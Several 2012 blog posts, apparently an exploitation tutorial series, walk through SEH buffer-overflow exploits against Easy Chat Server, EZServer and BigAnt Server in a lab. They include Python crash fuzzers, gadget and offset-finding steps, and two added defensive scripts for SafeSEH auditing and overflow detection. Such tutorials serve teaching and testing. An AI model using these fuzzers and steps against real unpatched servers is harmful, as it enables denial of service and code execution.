Friday, October 19, 2012

Crafted File with Msfpayload and Msfencode


Metasploit is a framework that provides information about security vulnerabilities and aids in penetration testing. It contains several programs, including msfpayload and msfencode.

msfpayload is one of the tools contained in Metasploit; it is used to generate a payload.



Wednesday, October 10, 2012

Software Exploitation : Easy Chat Server

Now I'm going to show you how to exploit an application called Easy Chat Server running on Windows XP SP3.

As shown in the image above, we can access the server from a browser on the BackTrack system.

Because this application is a web application, we will capture its traffic with Wireshark.

From the capture above, we can see that the login is sent with the GET method, so that is the method our exploitation will use.

Our first fuzzer:

#!/usr/bin/python
# Fuzzer for Easy Chat Server: fills the username and password parameters
# of the chat.ghp GET request (captured with Wireshark above) with 5000 'A' bytes.

import socket
target="192.168.1.101"
target_port=80
data="\x41" * 5000                       # 5000 x 'A'
buff="GET /chat.ghp?username="+data+"&password="+data+"&room=1 HTTP/1.1\r\n"
buff+="Host:192.168.1.101\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target,target_port))
sock.send(buff+"\r\n\r\n")               # the empty line terminates the HTTP headers
print "Sukses....!!"
sock.close()

Now we can see what happens in the SEH chain (View + SEH chain in OllyDbg).

Then press Shift+F9 (pass the exception to the program) and look at this picture:

Looking for a stepping stone

The stepping stone is a module that contains a POP POP RETN instruction sequence. I chose ssleay32.dll from the Easy Chat Server installation folder.
As we can see in the picture, the flag bits in the second byte are zero, so the module is not protected by SafeSEH. Now we will look for POP POP RETN sequences contained in the module ssleay32.dll.
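
What OllyDbg shows in that picture can be checked offline by reading the module's PE headers: a PE32 image is SafeSEH-protected when its Load Config directory carries a non-empty SEHandlerTable, and a module flagged IMAGE_DLLCHARACTERISTICS_NO_SEH is treated by Windows as having no valid handlers at all. The Python below is an added example written for this page, not code from the post or from Metasploit. It builds a constructed, headers-only PE32 image in memory (build_sample_pe32 and audit_pe are hypothetical helper names) so it runs without any real DLL, and the same audit_pe() can be pointed at DLLs on disk to list which modules a vendor shipped without /SAFESEH.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* flags from the PE optional header
DYNAMIC_BASE = 0x0040
NX_COMPAT = 0x0100
NO_SEH = 0x0400
LOAD_CONFIG_DIR = 10          # index of IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG

def rva_to_offset(sections, rva):
    """Map a relative virtual address to a file offset using the section table."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    return None

def audit_pe(data: bytes) -> dict:
    """Report the SEH-related hardening of a PE32 image (hypothetical helper name)."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = pe + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(n_dirs)]
    sections = []
    for i in range(nsections):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    seh_table = seh_count = 0
    if LOAD_CONFIG_DIR < n_dirs and dirs[LOAD_CONFIG_DIR][0]:
        lc = rva_to_offset(sections, dirs[LOAD_CONFIG_DIR][0])
        # IMAGE_LOAD_CONFIG_DIRECTORY32: SEHandlerTable at +0x40, SEHandlerCount at +0x44
        if lc is not None and struct.unpack_from("<I", data, lc)[0] >= 0x48:
            seh_table, seh_count = struct.unpack_from("<II", data, lc + 0x40)
    return {
        "no_seh_flag": bool(dll_chars & NO_SEH),
        "seh_handler_count": seh_count if seh_table else 0,
        # protected if it registers a handler table, or declares it uses no SEH at all
        "safeseh": bool(dll_chars & NO_SEH) or (seh_table != 0 and seh_count > 0),
        "nx_compat": bool(dll_chars & NX_COMPAT),
        "dynamic_base": bool(dll_chars & DYNAMIC_BASE),
    }

def build_sample_pe32(dll_characteristics: int, seh_handler_count: int) -> bytes:
    """Constructed, headers-only PE32 image for testing: one .rdata section
    holding a Load Config directory. Not a real DLL from the page."""
    opt = bytearray(224)                                   # PE32 optional header with 16 dirs
    struct.pack_into("<H", opt, 0, 0x10B)                  # Magic: PE32
    struct.pack_into("<III", opt, 28, 0x10000000, 0x1000, 0x200)   # ImageBase, SectionAlign, FileAlign
    struct.pack_into("<II", opt, 56, 0x2000, 0x200)        # SizeOfImage, SizeOfHeaders
    struct.pack_into("<HH", opt, 68, 2, dll_characteristics)       # Subsystem, DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                    # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * LOAD_CONFIG_DIR, 0x1000, 0x48)  # Load Config RVA/size
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x2102)   # i386, 1 section, DLL
    section = b".rdata\0\0" + struct.pack("<IIII", 0x200, 0x1000, 0x200, 0x200) + bytes(16)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))            # e_lfanew -> PE signature
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section).ljust(0x200, b"\0")
    load_config = bytearray(0x48)
    struct.pack_into("<I", load_config, 0, 0x48)           # Size of the structure
    if seh_handler_count:
        struct.pack_into("<II", load_config, 0x40, 0x1100, seh_handler_count)
    return headers + bytes(load_config).ljust(0x200, b"\0")

if __name__ == "__main__":
    import sys
    images = {"unprotected": build_sample_pe32(0, 0),
              "safeseh": build_sample_pe32(NX_COMPAT | DYNAMIC_BASE, 12)}
    for arg in sys.argv[1:]:                               # optional: real DLLs on disk
        with open(arg, "rb") as f:
            images[arg] = f.read()
    for name, image in images.items():
        print(name, audit_pe(image))
```

Only PE32 is handled; 64-bit PE32+ images do not use SafeSEH because x64 exception handling is table-based. For a defender the report says which third-party modules need rebuilding with /SAFESEH (and ideally /NXCOMPAT and /DYNAMICBASE), which is the mitigation that removes this kind of stepping stone from the process.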

root@bt:/opt/metasploit/msf3# ./msfpescan -p /root/ssleay32.dll

We can use the POP POP RETN sequence located at address 0x1001b9a2.

In OllyDbg select the menu View + Executable modules, then double-click ssleay32.dll.

In this module window, right-click + Search for + Sequence of commands.

A new window will appear; fill it with the following commands.

Click the Find button and a new window will appear again.

Seeking the offset that overwrites SEH

In this step, we can use ./pattern_create.rb

Put the output of pattern_create (saved as chatpattern.txt) into our fuzzer.

Then OllyDbg will look like the following:

Then press Shift+F9, and we will see the contents of EIP.

We can use pattern_offset.rb to determine how many bytes into the fuzzer data the value that reached EIP sits.

With these results, we modify our fuzzer as follows:

Run the fuzzer and look in OllyDbg.

Press Shift+F9 and see what happens in EIP.

Wednesday, October 3, 2012

Software Exploitation : EZServer6

In this tutorial we will try to exploit a video server application called EZServer, running on Windows XP. This application can be accessed with a web browser on port 8000, so we will send a fuzzer that carries garbage data via the GET method.

The fuzzer used is as follows:
#!/usr/bin/python
# Fuzzer for EZServer: a GET request whose path is 10000 'A' bytes.

import socket
target="192.168.1.101"
target_port=8000
buff="GET /" + "\x41" * 10000 + " HTTP/1.0\r\n\r\n\r\n"   # space before HTTP/1.0 completes the request line
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target,target_port))
sock.send(buff)
print "Sukses....!!"
sock.close()


Let's fuzz and see what happens...

EZServer crashes and disappears from the screen. Then we will look at it through OllyDbg.

To be continued... ^_^

Monday, October 1, 2012

Software Exploitation : BigAnt Server

As we know, BigAnt Server is compiled with SEH and SafeSEH; in this tutorial I'm going to show you how to exploit this application.

Fuzzing:

#!/usr/bin/python
# Fuzzer for BigAnt Server: the USV command followed by 2500 'A' bytes.

import socket
target="192.168.1.101"
target_port=6660
buff="USV " + "\x41" * 2500
buff+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target,target_port))
sock.send(buff)
print "Sukses....!!"
sock.close()
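
All three fuzzers on this page (Easy Chat Server, EZServer and BigAnt) share one signature: a single request field filled with thousands of copies of one byte. The Python below is an added example written for this page, not part of any post; it takes constructed copies of those requests plus a normal login as input and flags any field that is longer than a hypothetical limit or consists of a long run of one repeated byte. The thresholds MAX_FIELD and MAX_RUN and the function names are assumptions to tune per application; the same check can run inside a reverse proxy or over a packet capture to spot this class of overflow attempt before it reaches the vulnerable parser.

```python
import re
from urllib.parse import parse_qsl

# Constructed samples standing in for what a proxy or packet capture would hand us:
# a legitimate login, the three fuzz requests from this page's posts (BigAnt is not HTTP).
SAMPLES = {
    "legit_login": b"GET /chat.ghp?username=alice&password=s3cret&room=1 HTTP/1.1\r\nHost: 192.168.1.101\r\n\r\n",
    "easychat_fuzz": b"GET /chat.ghp?username=" + b"A" * 5000 + b"&password=" + b"A" * 5000
                     + b"&room=1 HTTP/1.1\r\nHost: 192.168.1.101\r\n\r\n",
    "ezserver_fuzz": b"GET /" + b"A" * 10000 + b" HTTP/1.0\r\n\r\n",
    "bigant_fuzz": b"USV " + b"A" * 2500 + b"\r\n\r\n",
}

MAX_FIELD = 256   # hypothetical limit; set it to the longest value the application legitimately accepts
MAX_RUN = 64      # longest run of one repeated byte tolerated inside a single field

def longest_run(value: bytes) -> int:
    """Length of the longest run of one repeated byte (0 for empty input)."""
    best = 0
    for m in re.finditer(rb"(.)\1*", value, re.DOTALL):
        best = max(best, len(m.group(0)))
    return best

def extract_fields(raw: bytes) -> dict:
    """Split the first request line into named fields so each can be checked on its own."""
    first_line = raw.split(b"\r\n", 1)[0]
    parts = first_line.split(b" ")
    if len(parts) == 3 and parts[2].startswith(b"HTTP/"):
        path, _, query = parts[1].partition(b"?")
        fields = {"path": path}
        for k, v in parse_qsl(query.decode("latin-1"), keep_blank_values=True):
            fields["query." + k] = v.encode("latin-1")
        return fields
    # Not HTTP: treat the first token as the command and the remainder as its argument
    return {"command": parts[0], "argument": first_line[len(parts[0]) + 1:]}

def inspect_request(raw: bytes, max_field: int = MAX_FIELD, max_run: int = MAX_RUN) -> list:
    """Return one finding per field that exceeds the length or repeated-byte limit."""
    findings = []
    for name, value in extract_fields(raw).items():
        run = longest_run(value)
        if len(value) > max_field or run > max_run:
            findings.append({"field": name, "length": len(value), "longest_run": run})
    return findings

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, inspect_request(raw) or "clean")
```

Length limits at the proxy are a compensating control only; the real fix is bounds checking in the server's own parser. The BigAnt sample also shows why a rule written purely for HTTP misses line-based services: the same check has to apply to whatever protocol the listener speaks.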


Run this fuzzer and see what happens in OllyDbg.

But EIP is not overwritten by our fuzzer, because this application is compiled with SEH and SafeSEH. To look into SEH, select View + SEH chain.

So press Shift+F9 (pass the exception to the program) to let our fuzzer data reach EIP.

In the figure above we can see that EIP is overwritten with 41414141; these characters come from the fuzzer.

To be continued... ^_^